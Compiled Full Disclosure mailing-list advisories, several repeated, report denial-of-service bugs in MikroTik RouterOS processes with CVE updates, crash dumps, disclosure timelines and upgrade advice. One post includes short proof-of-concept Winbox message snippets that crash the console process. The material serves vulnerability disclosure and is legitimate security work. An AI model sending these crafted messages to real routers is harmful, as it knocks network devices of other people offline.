Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/resolver process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /nova/bin/user process. An
authenticated remote attacker can cause a Denial of Service due to an
assertion failure via a crafted packet.


Q C  于2020年9月9日周三 下午9:02写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
> 
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
> ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98
> ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
>  /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
> e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c
> 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72
> 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
> 
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
> ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4
> ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
>   /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
>  /lib/libucrypto.so
> 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
>  /lib/liburadius.so
> 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/igmp-proxy process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec
process. An authenticated remote attacker can cause a Denial of Service due
to an assertion failure via a crafted packet.



Q C  于2020年8月13日周四 下午7:14写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
> 
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8
> ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x
> ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
>   /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32
> a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32
> a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4
> 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
> 
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200
> ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291
> ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
>   /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
>  /lib/libdl-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
>   /ram/pckg/dhcp/lib/libudhcp.so
> 2020.06.04-18:25:16.04@0: 

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers
from an uncontrolled resource consumption vulnerability in the
/nova/bin/cerm process. An authenticated remote attacker can cause a Denial
of Service due to overloading the systems CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/traceroute process. An
authenticated remote attacker can cause a Denial of Service due via the
loop counter variable.



Q C  于2020年5月10日周日 上午10:41写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high cpu load, which may make the device respond slowly or unable to
> respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been
assigned to these two vulnerabilities.


CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
a memory corruption vulnerability in the /nova/bin/console process. An
authenticated remote attacker can cause a Denial of Service (NULL
pointer dereference)


CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
an assertion failure vulnerability in the /nova/bin/console process.
An authenticated remote attacker can cause a Denial of Service due to
an assertion failure via a crafted packet





Q C  于2020年4月14日周二 下午6:29写道：

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fix yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following pocs are based on the tool routeros (
> https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23reported the 2nd issue to the vendor
> 2019/08/26reported the 1st issue to the vendor
> 2019/08/28vendor reproduced the 1st issue and will fix it as soon as
> possible
> 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as
> possible
> 2019/12/02notified the vendor the 1st issue still exists in version
> 6.44.6 (2nd issue fixed)
> 2020/01/06no response from the vendor, and did the initial disclosure
> 2020/04/14re-tested these two issues against the stable 6.46.5, and
> updated the disclosure
>
>
>
> Q C  于2020年1月6日周一 下午7:32写道：
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ==
>>
>> RouterOS is the operating system used on the MikroTik's devices, such as
>> switch, router and access point.
>>
>>
>> Description of vulnerabilities
>> ==
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer reference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process duo to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> 
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ==
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. memory corruption
The resolver process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11

2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08
esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00
edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
   /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5
7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00
00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04
8b

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The user process suffers from an assertion failure vulnerability. There is
a reachable assertion in the user process. By sending a crafted packet, an
authenticated remote user can crash the user process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6

2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790
esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4
edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
/nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  00:0c 948
   /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65
77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70
77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.


Solution

[FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. NULL pointer dereference
The igmpproxy process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
igmpproxy process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11

2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8
esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b
edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
/ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9
7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9
7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c
0f

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The ipsec process suffers from an assertion failure vulnerability. There is
a reachable assertion in the ipsec process. By sending a crafted packet, an
authenticated remote user can crash the ipsec process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6

2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450
esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291
edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
/ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
/ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp  00:0c 956
   /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47
77 06 00 00 00 00 92 48 77 20 00 00 00 

[FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable
6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found. Maybe other release trees also suffer from
these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption
issue. By sending a crafted packet, an authenticated remote user can cause
a high cpu load, which may make the device respond slowly or unable to
respond.

2. The traceroute process suffers from a memory corruption issue. By
sending a crafted packet, an authenticated remote user can crash the
traceroute process due to invalid memory access.


Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

[Q C]

[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
from these two vulnerabilities.

Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fix yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Poc
===
The following pocs are based on the tool routeros (
https://github.com/tenable/routeros)

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===
2019/08/23reported the 2nd issue to the vendor
2019/08/26reported the 1st issue to the vendor
2019/08/28vendor reproduced the 1st issue and will fix it as soon as
possible
2019/08/30vendor reproduced the 2nd issue and will fix it as soon as
possible
2019/12/02notified the vendor the 1st issue still exists in version
6.44.6 (2nd issue fixed)
2020/01/06no response from the vendor, and did the initial disclosure
2020/04/14re-tested these two issues against the stable 6.46.5, and
updated the disclosure



Q C  于2020年1月6日周一 下午7:32写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer reference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process duo to assertion failure by sending a crafted
> packet.
>
> Solution
